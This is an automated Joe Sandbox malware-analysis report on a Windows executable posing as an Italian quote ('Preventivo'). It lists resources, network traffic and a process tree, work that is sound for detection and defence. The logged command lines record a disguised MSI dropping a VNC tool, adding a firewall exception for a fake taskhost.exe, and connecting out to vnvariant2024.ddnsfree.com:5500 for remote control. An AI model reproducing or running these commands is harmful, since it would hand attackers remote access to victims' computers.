RT_ICON	0x35fed8	0x2b528	Device independent bitmap graphic, 256 x 336 x 32, image size 172032, resolution 2834 x 2834 px/m	English	United States	0.11184685090843514
RT_ICON	0x38b400	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.08703319502074688
RT_ICON	0x38d9a8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.16463414634146342
RT_ICON	0x38ea50	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.18565573770491803
RT_ICON	0x38f3d8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.3262411347517731
RT_DIALOG	0x38f840	0xac	data	English	United States	0.7151162790697675
RT_DIALOG	0x38f8ec	0xcc	data	English	United States	0.6911764705882353
RT_DIALOG	0x38f9b8	0x1b4	data	English	United States	0.5458715596330275
RT_DIALOG	0x38fb6c	0x136	data	English	United States	0.6064516129032258
RT_DIALOG	0x38fca4	0x4c	data	English	United States	0.8289473684210527
RT_STRING	0x38fcf0	0x234	data	English	United States	0.4645390070921986
RT_STRING	0x38ff24	0x182	data	English	United States	0.5103626943005182
RT_STRING	0x3900a8	0x50	data	English	United States	0.7375
RT_STRING	0x3900f8	0x9a	data	English	United States	0.37662337662337664
RT_STRING	0x390194	0x2f6	data	English	United States	0.449868073878628
RT_STRING	0x39048c	0x5c0	data	English	United States	0.3498641304347826
RT_STRING	0x390a4c	0x434	data	English	United States	0.32899628252788105
RT_STRING	0x390e80	0x100	data	English	United States	0.5703125
RT_STRING	0x390f80	0x484	data	English	United States	0.39186851211072665
RT_STRING	0x391404	0x1ea	data	English	United States	0.44081632653061226
RT_STRING	0x3915f0	0x18a	data	English	United States	0.5228426395939086
RT_STRING	0x39177c	0x216	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	United States	0.46254681647940077
RT_STRING	0x391994	0x624	data	English	United States	0.3575063613231552
RT_STRING	0x391fb8	0x660	data	English	United States	0.3474264705882353
RT_STRING	0x392618	0x2e2	data	English	United States	0.4037940379403794
RT_GROUP_ICON	0x3928fc	0x14	data	English	United States	1.2
RT_VERSION	0x392910	0x30c	data	English	United States	0.441025641025641
RT_HTML	0x392c1c	0x3835	ASCII text, with very long lines (443), with CRLF line terminators	English	United States	0.08298005420807561
RT_HTML	0x396454	0x1316	ASCII text, with CRLF line terminators	English	United States	0.18399508800654932
RT_HTML	0x39776c	0x8c77	HTML document, ASCII text, with CRLF line terminators	English	United States	0.08081426068578103
RT_HTML	0x3a03e4	0x6acd	HTML document, ASCII text, with CRLF line terminators	English	United States	0.10679931238798873
RT_HTML	0x3a6eb4	0x6a2	HTML document, ASCII text, with CRLF line terminators	English	United States	0.3486454652532391
RT_HTML	0x3a7558	0x104a	HTML document, ASCII text, with CRLF line terminators	English	United States	0.2170263788968825
RT_HTML	0x3a85a4	0x15b1	HTML document, ASCII text, with CRLF line terminators	English	United States	0.17612101566720692
RT_HTML	0x3a9b58	0x205c	exported SGML document, ASCII text, with very long lines (659), with CRLF line terminators	English	United States	0.13604538870111058
RT_HTML	0x3abbb4	0x368d	HTML document, ASCII text, with CRLF line terminators	English	United States	0.10834228428213391
RT_MANIFEST	0x3af244	0x813	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.41025641025641024

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 23, 2024 12:17:58.867115021 CET	49729	80	192.168.2.4	93.184.216.34
Jan 23, 2024 12:17:58.969831944 CET	80	49729	93.184.216.34	192.168.2.4
Jan 23, 2024 12:17:58.969996929 CET	49729	80	192.168.2.4	93.184.216.34
Jan 23, 2024 12:17:58.970385075 CET	49729	80	192.168.2.4	93.184.216.34
Jan 23, 2024 12:17:59.072958946 CET	80	49729	93.184.216.34	192.168.2.4
Jan 23, 2024 12:17:59.073906898 CET	80	49729	93.184.216.34	192.168.2.4
Jan 23, 2024 12:17:59.074006081 CET	80	49729	93.184.216.34	192.168.2.4
Jan 23, 2024 12:17:59.074079037 CET	49729	80	192.168.2.4	93.184.216.34
Jan 23, 2024 12:17:59.074244976 CET	49729	80	192.168.2.4	93.184.216.34
Jan 23, 2024 12:17:59.078406096 CET	49729	80	192.168.2.4	93.184.216.34
Jan 23, 2024 12:17:59.078449011 CET	49729	80	192.168.2.4	93.184.216.34
Jan 23, 2024 12:18:17.642659903 CET	49738	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:17.642687082 CET	443	49738	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:17.643018007 CET	49738	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:17.643337965 CET	49738	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:17.643349886 CET	443	49738	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:17.886384010 CET	443	49738	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:17.887391090 CET	49738	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:17.887402058 CET	443	49738	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:17.888324022 CET	443	49738	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:17.888484001 CET	49738	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:17.888489962 CET	443	49738	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:17.888566971 CET	49738	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:17.891391039 CET	49738	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:17.891453028 CET	443	49738	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:17.891575098 CET	49738	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:17.891587019 CET	443	49738	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.082823992 CET	49738	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.117850065 CET	443	49738	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.118026018 CET	443	49738	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.118132114 CET	49738	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.119770050 CET	49738	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.119770050 CET	49738	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.119786978 CET	443	49738	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.120383978 CET	49738	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.124455929 CET	49740	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.124546051 CET	443	49740	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.124893904 CET	49740	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.124893904 CET	49740	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.124977112 CET	443	49740	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.365804911 CET	443	49740	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.367043018 CET	49740	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.367068052 CET	443	49740	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.368156910 CET	443	49740	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.368288040 CET	49740	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.368294954 CET	443	49740	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.368382931 CET	49740	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.368896961 CET	49740	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.368980885 CET	49740	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.368985891 CET	443	49740	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.369035959 CET	443	49740	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.488894939 CET	49740	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.488907099 CET	443	49740	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.661247969 CET	443	49740	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.661262035 CET	443	49740	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.661279917 CET	443	49740	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.661329985 CET	49740	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.661340952 CET	443	49740	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.661367893 CET	49740	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.661389112 CET	49740	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.743396997 CET	49740	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.743443966 CET	443	49740	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:22.051400900 CET	49747	443	192.168.2.4	23.54.200.159
Jan 23, 2024 12:18:22.051444054 CET	443	49747	23.54.200.159	192.168.2.4
Jan 23, 2024 12:18:22.051523924 CET	49747	443	192.168.2.4	23.54.200.159
Jan 23, 2024 12:18:22.051836014 CET	49747	443	192.168.2.4	23.54.200.159
Jan 23, 2024 12:18:22.051851988 CET	443	49747	23.54.200.159	192.168.2.4
Jan 23, 2024 12:18:22.367913008 CET	443	49747	23.54.200.159	192.168.2.4
Jan 23, 2024 12:18:22.368402958 CET	49747	443	192.168.2.4	23.54.200.159
Jan 23, 2024 12:18:22.368437052 CET	443	49747	23.54.200.159	192.168.2.4
Jan 23, 2024 12:18:22.369436979 CET	443	49747	23.54.200.159	192.168.2.4
Jan 23, 2024 12:18:22.369497061 CET	49747	443	192.168.2.4	23.54.200.159
Jan 23, 2024 12:18:22.408909082 CET	49747	443	192.168.2.4	23.54.200.159
Jan 23, 2024 12:18:22.409085035 CET	443	49747	23.54.200.159	192.168.2.4
Jan 23, 2024 12:18:22.409183979 CET	49747	443	192.168.2.4	23.54.200.159
Jan 23, 2024 12:18:22.453907967 CET	443	49747	23.54.200.159	192.168.2.4
Jan 23, 2024 12:18:22.486505032 CET	49747	443	192.168.2.4	23.54.200.159
Jan 23, 2024 12:18:22.486571074 CET	443	49747	23.54.200.159	192.168.2.4
Jan 23, 2024 12:18:22.515590906 CET	443	49747	23.54.200.159	192.168.2.4
Jan 23, 2024 12:18:22.515680075 CET	49747	443	192.168.2.4	23.54.200.159
Jan 23, 2024 12:18:22.516412020 CET	49747	443	192.168.2.4	23.54.200.159
Jan 23, 2024 12:18:22.516447067 CET	443	49747	23.54.200.159	192.168.2.4
Jan 23, 2024 12:18:25.620049000 CET	49749	5500	192.168.2.4	140.228.29.110
Jan 23, 2024 12:18:25.742728949 CET	5500	49749	140.228.29.110	192.168.2.4
Jan 23, 2024 12:18:25.744896889 CET	49749	5500	192.168.2.4	140.228.29.110
Jan 23, 2024 12:18:25.746346951 CET	49749	5500	192.168.2.4	140.228.29.110
Jan 23, 2024 12:18:25.770776987 CET	49749	5500	192.168.2.4	140.228.29.110
Jan 23, 2024 12:18:25.893244028 CET	5500	49749	140.228.29.110	192.168.2.4
Jan 23, 2024 12:18:35.908354044 CET	49749	5500	192.168.2.4	140.228.29.110
Jan 23, 2024 12:18:36.031210899 CET	5500	49749	140.228.29.110	192.168.2.4
Jan 23, 2024 12:18:46.033581018 CET	49749	5500	192.168.2.4	140.228.29.110
Jan 23, 2024 12:18:46.156461954 CET	5500	49749	140.228.29.110	192.168.2.4
Jan 23, 2024 12:18:56.174005032 CET	49749	5500	192.168.2.4	140.228.29.110
Jan 23, 2024 12:18:56.297275066 CET	5500	49749	140.228.29.110	192.168.2.4
Jan 23, 2024 12:19:06.299117088 CET	49749	5500	192.168.2.4	140.228.29.110
Jan 23, 2024 12:19:06.422399998 CET	5500	49749	140.228.29.110	192.168.2.4
Jan 23, 2024 12:19:16.425880909 CET	49749	5500	192.168.2.4	140.228.29.110
Jan 23, 2024 12:19:16.548703909 CET	5500	49749	140.228.29.110	192.168.2.4
Jan 23, 2024 12:19:26.549020052 CET	49749	5500	192.168.2.4	140.228.29.110
Jan 23, 2024 12:19:26.671834946 CET	5500	49749	140.228.29.110	192.168.2.4

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 23, 2024 12:17:58.739626884 CET	59421	53	192.168.2.4	1.1.1.1
Jan 23, 2024 12:17:58.858447075 CET	53	59421	1.1.1.1	192.168.2.4
Jan 23, 2024 12:18:22.180207968 CET	64894	53	192.168.2.4	1.1.1.1
Jan 23, 2024 12:18:22.339932919 CET	53	64894	1.1.1.1	192.168.2.4
Jan 23, 2024 12:18:40.412035942 CET	60215	53	192.168.2.4	1.1.1.1
Jan 23, 2024 12:18:40.570370913 CET	53	60215	1.1.1.1	192.168.2.4
Jan 23, 2024 12:19:04.518619061 CET	53832	53	192.168.2.4	1.1.1.1
Jan 23, 2024 12:19:04.658823967 CET	53	53832	1.1.1.1	192.168.2.4
Jan 23, 2024 12:19:28.738209009 CET	50384	53	192.168.2.4	1.1.1.1
Jan 23, 2024 12:19:28.898479939 CET	53	50384	1.1.1.1	192.168.2.4
Jan 23, 2024 12:19:52.877954960 CET	63247	53	192.168.2.4	1.1.1.1
Jan 23, 2024 12:19:53.018186092 CET	53	63247	1.1.1.1	192.168.2.4
Jan 23, 2024 12:20:16.956233978 CET	62376	53	192.168.2.4	1.1.1.1
Jan 23, 2024 12:20:17.096158981 CET	53	62376	1.1.1.1	192.168.2.4
Jan 23, 2024 12:20:41.206412077 CET	54076	53	192.168.2.4	1.1.1.1
Jan 23, 2024 12:20:41.365834951 CET	53	54076	1.1.1.1	192.168.2.4

Target ID:	0
Start time:	12:17:57
Start date:	23/01/2024
Path:	C:\Users\user\Desktop\Preventivo24.01.11.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Preventivo24.01.11.exe
Imagebase:	0xe80000
File size:	5'955'744 bytes
MD5 hash:	32F35B78A3DC5949CE3C99F2981DEF6B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	3
Start time:	12:18:00
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Preventivo24.01.11.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1706008514 " AI_EUIMSI="
Imagebase:	0x540000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	6
Start time:	12:18:02
Start date:	23/01/2024
Path:	C:\Games\viewer.exe
Wow64 process (32bit):	true
Commandline:	C:\Games\viewer.exe" /HideWindow "C:\Games\cmmc.cmd
Imagebase:	0x610000
File size:	412'832 bytes
MD5 hash:	29ED7D64CE8003C0139CCCB04D9AF7F0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	7
Start time:	12:18:03
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	12
Start time:	12:18:04
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	wmic process where (name="taskhost.exe") get commandline
Imagebase:	0xf10000
File size:	427'008 bytes
MD5 hash:	E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	14
Start time:	12:18:08
Start date:	23/01/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf
Imagebase:	0x7ff6bc1b0000
File size:	5'641'176 bytes
MD5 hash:	24EAD1C46A47022347DC0F05F6EFBB8C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Target ID:	17
Start time:	12:18:09
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Preventivo24.01.11.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Games\IDD.txt

C:\Games\WinVNC.log

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\585b98c7-6e1b-42c6-9d18-1e6776e46b81.tmp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7768

Windows Analysis Report
Preventivo24.01.11.exe

Target ID:	24
Start time:	12:18:10
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 2
Imagebase:	0xd30000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	26
Start time:	12:18:11
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	28
Start time:	12:18:13
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	29
Start time:	12:18:15
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	31
Start time:	12:18:16
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /im rundll32.exe /f
Imagebase:	0x180000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	36
Start time:	12:18:17
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Imagebase:	0x1560000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	39
Start time:	12:18:18
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /im rundll32.exe /f
Imagebase:	0x180000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	41
Start time:	12:18:19
Start date:	23/01/2024
Path:	C:\Games\taskhost.exe
Wow64 process (32bit):	true
Commandline:	C:\Games\taskhost.exe -autoreconnect ID:5383948 -connect vnvariant2024.ddnsfree.com:5500 -run
Imagebase:	0xa0000
File size:	2'648'008 bytes
MD5 hash:	663FE548A57BBD487144EC8226A7A549
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	42
Start time:	12:18:20
Start date:	23/01/2024
Path:	C:\Games\viewer.exe
Wow64 process (32bit):	true
Commandline:	C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
Imagebase:	0x610000
File size:	412'832 bytes
MD5 hash:	29ED7D64CE8003C0139CCCB04D9AF7F0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	50
Start time:	12:18:21
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true